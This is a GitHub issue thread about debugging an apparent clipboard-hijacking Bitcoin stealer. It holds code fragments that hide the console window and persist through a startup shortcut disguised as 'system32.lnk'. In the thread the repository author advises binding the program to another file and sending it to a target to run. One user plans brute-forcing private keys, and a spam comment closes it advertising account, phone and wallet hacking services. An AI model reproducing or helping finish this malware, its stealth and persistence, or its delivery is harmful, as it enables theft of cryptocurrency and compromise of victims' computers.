### ISSUE TITLE
Getting an error...

### ISSUE THREAD

**Issue by trextrader** [ElmanSh/Bitcoin-hack-with-clipboard-in-python#1]
@ElmanTr  - Nice work and  everything seemed to be running, then I went in and completed config() as follows:

    if name == 'C://local//Bitcoin-hack-with-clipboard-in-python//':
        alternative = "C://local//Bitcoin-hack-with-clipboard-in-python//"
        return alternative

    if name == 'btc wallet 1':
        alternative = "MyBTCWallet1"
        return alternative

    if name == 'btc wallet 2':
        alternative = "MyBTCWallet2"
        return alternative

    if name == 'btc wallet 3':
        alternative = "MyBTCWallet3"
        return alternative
--------------------------------
Also did a find/replace-all for {btc wallet1,...,bcwallet3} which made 3 replacements, the ones above and two other locations.
--------------------------------
I popped in the paths and replaced \\User\\{}\\... with {} = myusername as follows:

lnk_r = subprocess.run('dir',cwd='C:\\Users\\{ME}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'.format(info_o2),shell=True,stdout=subprocess.PIPE)
lnk_output = lnk_r.stdout.decode("utf-8")
f3 = lnk_output.find('system32.lnk')
if f3 == -1 :
    path = os.path.join("C:\\Users\\(ME}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup".format(info_o2), "system32.lnk")
    target = "{}\\BTC-hack-with-clipboard.exe".format(config('C:\\ocal\\Bitcoin-hack-with-clipboard-in-python\\'))
    wDir = config('C:\\local\\Bitcoin-hack-with-clipboard-in-python\\')
    
    I also executed the following because it kept throwing an error:
[prompt]> BTC-env3.exe (the .exe I created from the .py script using _auto-py-to-exe_

env [prompt] >  BTC-env3.exe (Note: I renamed he filename to be a bit less blinging...lmao)

Traceback (most recent call last):
  File "BTC-env3.py", line 1, in <module>
    import win32clipboard
ModuleNotFoundError: No module named 'win32clipboard'
[19636] Failed to execute script BTC-env3
-----------------------------------------------
So, executed the following:

env [prompt]> python C:\local\Bitcoin-hack-with-clipboard-in-python\env\Scripts\pywin32_postinstall.py -install

And the following is the output, [it succeeded]:

Parsed arguments are: Namespace(destination='C:\\local\\Bitcoin-hack-with-clipboard-in-python\\env\\Lib\\site-packages', install=True, quiet=False, remove=False, silent=False, wait=None)
Copied pythoncom38.dll to C:\Windows\system32\pythoncom38.dll
Copied pywintypes38.dll to C:\Windows\system32\pywintypes38.dll
Registered: Python.Interpreter
Registered: Python.Dictionary
Registered: Python
-> Software\Python\PythonCore\3.8\Help[None]=None
-> Software\Python\PythonCore\3.8\Help\Pythonwin Reference[None]='C:\\local\\Bitcoin-hack-with-clipboard-in-python\\env\\Lib\\site-packages\\PyWin32.chm'
Pythonwin has been registered in context menu
Creating directory C:\local\Bitcoin-hack-with-clipboard-in-python\env\Lib\site-packages\win32com\gen_py
Shortcut for Pythonwin created
Shortcut to documentation created
**The pywin32 extensions were successfully installed.**
----------------------------------------------------------
However, when executing the .py script, the window disappears [as it should from your script]:
# Hide terminal
kernel = ctypes.WinDLL('kernel32')
user = ctypes.WinDLL('user32')
SW_HIDE = 0
hWnd = kernel.GetConsoleWindow()
user.ShowWindow(hWnd, SW_HIDE)

However, the .exe file is still throwing the error:
Traceback (most recent call last):
  File "BTC-env3.py", line 1, in <module>
    import win32clipboard
ModuleNotFoundError: No module named 'win32clipboard'
[19636] Failed to execute script BTC-env3

And, not seeing it in the ask manager as running...(???) - So, no way of telling if its running the background or not.
----------------------------------------------------------
Thanks  for  posting, I can actually hopefully get 120 BTC that were stolen from me and I know the people who did it, and I know their addresses {a least the ones they were using when it  was taken, and saw they have not spent it yet on the blockchain, so would be nice to get my BTC back...so it is being used legitimately since local  law enforcement cannot get off their asses to do anything! 

Last, I went ahead and commented out the hide terminal part and when running the script, seeing the following error:

Traceback (most recent call last):
  File "BTC-env3.py", line 59, in <module>
    shortcut.WorkingDirectory = wDir
  File "C:\local\Bitcoin-hack-with-clipboard-in-python\env\lib\site-packages\win32com\client\dynamic.py", line 565, in __setattr__
    raise AttributeError("Property '%s.%s' can not be set." % (self._username_, attr))
AttributeError: Property '<unknown>.WorkingDirectory' can not be set.

??? - I have taken ownership of that working directory and signed in with local user account and  a member of administrators, so that is not the reason for this error '<unkown>.WorkingDirectory' can not be set - any ideas too help me get this up and running would be greatly appreciated so I can hopefully recover if not all a part of whomever it was - a least I have their wallets, so I am creating env1, env2, and env3, to have 9 wallets in total, each envN.py will run within its own envN virtual environment.
---------------------------------------------------------------------------
And, I have some ideas for you as I have Mathematica 12 which has a new section called Blockchain, and that could be used to yours, mine, and others' advantage, so feel free to email me directly zapolator@gmail.com.

**Comment by trextrader** [comment]
> @ElmanTr - Nice work and everything seemed to be running, then I went in and completed config() as follows:
> 
> ```
> if name == 'C://local//Bitcoin-hack-with-clipboard-in-python//':
>     alternative = "C://local//Bitcoin-hack-with-clipboard-in-python//"
>     return alternative
> 
> if name == 'btc wallet 1':
>     alternative = "MyBTCWallet1"
>     return alternative
> 
> if name == 'btc wallet 2':
>     alternative = "MyBTCWallet2"
>     return alternative
> 
> if name == 'btc wallet 3':
>     alternative = "MyBTCWallet3"
>     return alternative
> ```
> 
> ## Also did a find/replace-all for {btc wallet1,...,bcwallet3} which made 3 replacements, the ones above and two other locations.
> I popped in the paths and replaced \User\{}\... with {} = myusername as follows:
> 
> lnk_r = subprocess.run('dir',cwd='C:\Users\{ME}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'.format(info_o2),shell=True,stdout=subprocess.PIPE)
> lnk_output = lnk_r.stdout.decode("utf-8")
> f3 = lnk_output.find('system32.lnk')
> if f3 == -1 :
> path = os.path.join("C:\Users\(ME}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup".format(info_o2), "system32.lnk")
> target = "{}\BTC-hack-with-clipboard.exe".format(config('C:\ocal\Bitcoin-hack-with-clipboard-in-python\'))
> wDir = config('C:\local\Bitcoin-hack-with-clipboard-in-python\')
> 
> ```
> I also executed the following because it kept throwing an error:
> ```
> 
> [prompt]> BTC-env3.exe (the .exe I created from the .py script using _auto-py-to-exe_
> 
> env [prompt] > BTC-env3.exe (Note: I renamed he filename to be a bit less blinging...lmao)
> 
> ## Traceback (most recent call last):
> File "BTC-env3.py", line 1, in
> import win32clipboard
> ModuleNotFoundError: No module named 'win32clipboard'
> [19636] Failed to execute script BTC-env3
> So, executed the following:
> 
> env [prompt]> python C:\local\Bitcoin-hack-with-clipboard-in-python\env\Scripts\pywin32_postinstall.py -install
> 
> And the following is the output, [it succeeded]:
> 
> ## Parsed arguments are: Namespace(destination='C:\local\Bitcoin-hack-with-clipboard-in-python\env\Lib\site-packages', install=True, quiet=False, remove=False, silent=False, wait=None)
> Copied pythoncom38.dll to C:\Windows\system32\pythoncom38.dll
> Copied pywintypes38.dll to C:\Windows\system32\pywintypes38.dll
> Registered: Python.Interpreter
> Registered: Python.Dictionary
> Registered: Python
> -> Software\Python\PythonCore\3.8\Help[None]=None
> -> Software\Python\PythonCore\3.8\Help\Pythonwin Reference[None]='C:\local\Bitcoin-hack-with-clipboard-in-python\env\Lib\site-packages\PyWin32.chm'
> Pythonwin has been registered in context menu
> Creating directory C:\local\Bitcoin-hack-with-clipboard-in-python\env\Lib\site-packages\win32com\gen_py
> Shortcut for Pythonwin created
> Shortcut to documentation created
> **The pywin32 extensions were successfully installed.**
> However, when executing the .py script, the window disappears [as it should from your script]:
> 
> # Hide terminal
> kernel = ctypes.WinDLL('kernel32')
> user = ctypes.WinDLL('user32')
> SW_HIDE = 0
> hWnd = kernel.GetConsoleWindow()
> user.ShowWindow(hWnd, SW_HIDE)
> 
> However, the .exe file is still throwing the error:
> Traceback (most recent call last):
> File "BTC-env3.py", line 1, in
> import win32clipboard
> ModuleNotFoundError: No module named 'win32clipboard'
> [19636] Failed to execute script BTC-env3
> 
> ## And, not seeing it in the ask manager as running...(???) - So, no way of telling if its running the background or not.
> Thanks for posting, I can actually hopefully get 120 BTC that were stolen from me and I know the people who did it, and I know their addresses {a least the ones they were using when it was taken, and saw they have not spent it yet on the blockchain, so would be nice to get my BTC back...so it is being used legitimately since local law enforcement cannot get off their asses to do anything!
> 
> Last, I went ahead and commented out the hide terminal part and when running the script, seeing the following error:
> 
> Traceback (most recent call last):
> File "BTC-env3.py", line 59, in
> shortcut.WorkingDirectory = wDir
> File "C:\local\Bitcoin-hack-with-clipboard-in-python\env\lib\site-packages\win32com\client\dynamic.py", line 565, in **setattr**
> raise AttributeError("Property '%s.%s' can not be set." % (self._username_, attr))
> AttributeError: Property '.WorkingDirectory' can not be set.
> 
> ## ??? - I have taken ownership of that working directory and signed in with local user account and a member of administrators, so that is not the reason for this error '.WorkingDirectory' can not be set - any ideas too help me get this up and running would be greatly appreciated so I can hopefully recover if not all a part of whomever it was - a least I have their wallets, so I am creating env1, env2, and env3, to have 9 wallets in total, each envN.py will run within its own envN virtual environment.
> And, I have some ideas for you as I have Mathematica 12 which has a new section called Blockchain, and that could be used to yours, mine, and others' advantage, so feel free to email me directly [zapolator@gmail.com](mailto:zapolator@gmail.com).

**Comment by trextrader** [comment]
Yes, I actually got it working (I think) and working on a script I will copy paste below with some comments/suggestions if you use Hangouts send me a quick note we can dive in a bit more externally...Some  simple things that will make this really sing well, especially for people like me who need to get back what was stolen and I have all their addresses - what is awesome about the blockchain, who cares who it is, as long as we have the wallets id we can dive in and go to town as long as they have not spent them elsewhere, and luckily for me they have not!  Interesting observation, whenever it states it has found a valid wallet it goes into a loop repeating the same message, and, if I try and copy paste  via my clipboard, it does not let me do so to update new addresses into the .py script - so, do  I jus let it go or restart it? If you only knew how royally screwed my family and two kids are, this came right at the right time 3 weeks before we are about to be evicted from out home for 5 years due to covid19.  So, for that I thank you sincerely for posting this, jus want to make sure I am "operating" correctly and not letting it loop endlessly and no do anything.  zapolator@gmail.com - hmu  and lets discuss a few different things anytime I rarely sleep, usually up coding CV algos for bringing out demons and whipping their butts as best as I can.  These demons are the mentally retarded ones apparently...lol

Its now throwing a working directory error so let me attempt to squash ha before submitting another potential issue.  As for how I got it to start working, I am no sure, but d-loading the sources for pywin32 and building via python setup.py install did something, even though pip install pywin32 was already installed, so something happened there...No idea however, in case anyone else has similar issues, try building pywin32 from source  and get the correct version...

**Comment by saucerr** [comment]
Howd you get on ?? ive been royally shafted also , wont go into too much detail but im fcccccckkkkkkedddd !

**Comment by ElmanTr** [comment]
> @ElmanTr - Nice work and everything seemed to be running, then I went in and completed config() as follows:
> 
> ```
> if name == 'C://local//Bitcoin-hack-with-clipboard-in-python//':
>     alternative = "C://local//Bitcoin-hack-with-clipboard-in-python//"
>     return alternative
> 
> if name == 'btc wallet 1':
>     alternative = "MyBTCWallet1"
>     return alternative
> 
> if name == 'btc wallet 2':
>     alternative = "MyBTCWallet2"
>     return alternative
> 
> if name == 'btc wallet 3':
>     alternative = "MyBTCWallet3"
>     return alternative
> ```
> 
> ## Also did a find/replace-all for {btc wallet1,...,bcwallet3} which made 3 replacements, the ones above and two other locations.
> 
> I popped in the paths and replaced \User\{}\... with {} = myusername as follows:
> 
> lnk_r = subprocess.run('dir',cwd='C:\Users\{ME}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'.format(info_o2),shell=True,stdout=subprocess.PIPE) lnk_output = lnk_r.stdout.decode("utf-8") f3 = lnk_output.find('system32.lnk') if f3 == -1 : path = os.path.join("C:\Users\(ME}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup".format(info_o2), "system32.lnk") target = "{}\BTC-hack-with-clipboard.exe".format(config('C:\ocal\Bitcoin-hack-with-clipboard-in-python\')) wDir = config('C:\local\Bitcoin-hack-with-clipboard-in-python\')
> 
> ```
> I also executed the following because it kept throwing an error:
> ```
> 
> [prompt]> BTC-env3.exe (the .exe I created from the .py script using _auto-py-to-exe_
> 
> env [prompt] > BTC-env3.exe (Note: I renamed he filename to be a bit less blinging...lmao)
> ## Traceback (most recent call last):
> File "BTC-env3.py", line 1, in
> import win32clipboard
> ModuleNotFoundError: No module named 'win32clipboard'
> [19636] Failed to execute script BTC-env3
> 
> So, executed the following:
> 
> env [prompt]> python C:\local\Bitcoin-hack-with-clipboard-in-python\env\Scripts\pywin32_postinstall.py -install
> 
> And the following is the output, [it succeeded]:
> ## Parsed arguments are: Namespace(destination='C:\local\Bitcoin-hack-with-clipboard-in-python\env\Lib\site-packages', install=True, quiet=False, remove=False, silent=False, wait=None)
> Copied pythoncom38.dll to C:\Windows\system32\pythoncom38.dll
> Copied pywintypes38.dll to C:\Windows\system32\pywintypes38.dll
> Registered: Python.Interpreter
> Registered: Python.Dictionary
> Registered: Python
> -> Software\Python\PythonCore\3.8\Help[None]=None
> -> Software\Python\PythonCore\3.8\Help\Pythonwin Reference[None]='C:\local\Bitcoin-hack-with-clipboard-in-python\env\Lib\site-packages\PyWin32.chm'
> Pythonwin has been registered in context menu
> Creating directory C:\local\Bitcoin-hack-with-clipboard-in-python\env\Lib\site-packages\win32com\gen_py
> Shortcut for Pythonwin created
> Shortcut to documentation created
> **The pywin32 extensions were successfully installed.**
> 
> However, when executing the .py script, the window disappears [as it should from your script]:
> # Hide terminal
> 
> kernel = ctypes.WinDLL('kernel32') user = ctypes.WinDLL('user32') SW_HIDE = 0 hWnd = kernel.GetConsoleWindow() user.ShowWindow(hWnd, SW_HIDE)
> 
> However, the .exe file is still throwing the error: Traceback (most recent call last): File "BTC-env3.py", line 1, in import win32clipboard ModuleNotFoundError: No module named 'win32clipboard' [19636] Failed to execute script BTC-env3
> ## And, not seeing it in the ask manager as running...(???) - So, no way of telling if its running the background or not.
> 
> Thanks for posting, I can actually hopefully get 120 BTC that were stolen from me and I know the people who did it, and I know their addresses {a least the ones they were using when it was taken, and saw they have not spent it yet on the blockchain, so would be nice to get my BTC back...so it is being used legitimately since local law enforcement cannot get off their asses to do anything!
> 
> Last, I went ahead and commented out the hide terminal part and when running the script, seeing the following error:
> 
> Traceback (most recent call last): File "BTC-env3.py", line 59, in shortcut.WorkingDirectory = wDir File "C:\local\Bitcoin-hack-with-clipboard-in-python\env\lib\site-packages\win32com\client\dynamic.py", line 565, in **setattr** raise AttributeError("Property '%s.%s' can not be set." % (self._username_, attr)) AttributeError: Property '.WorkingDirectory' can not be set.
> ## ??? - I have taken ownership of that working directory and signed in with local user account and a member of administrators, so that is not the reason for this error '.WorkingDirectory' can not be set - any ideas too help me get this up and running would be greatly appreciated so I can hopefully recover if not all a part of whomever it was - a least I have their wallets, so I am creating env1, env2, and env3, to have 9 wallets in total, each envN.py will run within its own envN virtual environment.
> 
> And, I have some ideas for you as I have Mathematica 12 which has a new section called Blockchain, and that could be used to yours, mine, and others' advantage, so feel free to email me directly [zapolator@gmail.com](mailto:zapolator@gmail.com).

Hello @trextrader,
Sorry for the 120 bitcoins stolen from you. I hope you can return it :)

In the meantime, you can not return your money just by having the wallet address of the person, and you must bind this file with another file and then send it to the person's computer to run.

**Comment by trextrader** [comment]
Sorry for delay, have yet to recover my btc, but, I am building a rather interesting brute force strategy that is a smart brute force method, so not just ad hoc, and will utikize various methods to coverge on private keys with balance so we can be un-fuckkkkkd bro!  
You might be able to help with some of the coding efforts as I am going at this solo and could really accelerate getting this done if you are interested lmk.
/Zapperman

    On Tuesday, November 16, 2021, 02:55:51 PM MST, saucerr ***@***.***> wrote:  
 
 


owd you get on ?? ive been royally shafted also , wont go into too much detail but im fcccccckkkkkkedddd !

—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.

**Comment by spygency1** [comment]
NEED URGENT HELP?!!

NOTE:MESSAGE ONLY THIS ACCOUNT
#🇬🇧Expert Here To Assist In Any Cyber Issues General_Hacking_Recovery_Spy_Blackmail_Stolen,Lost BTC_Hacked Phones ☎️ 📥
🌎Facebook hacking - recovery
🌎Instagram hacking - recovery
🌎Snapchat hacking - recovery
🌎Lost money(investment scams) recovery
🌎Cheating partner spy (online)
🌎Crypto wallet hacking
🌎Phone hacks📱
🌎Message hacks & tweaks

For swift response send a message to my social media accounts, we are active 24/7 to solve all your Online ETHICAL HACKING issues 

INSTAGRAM 📥 spygency.1

https://instagram.com/spygency.1?igshid=MzRlODBiNWFlZA==

EMAIL 📧 spygency@gmail.com
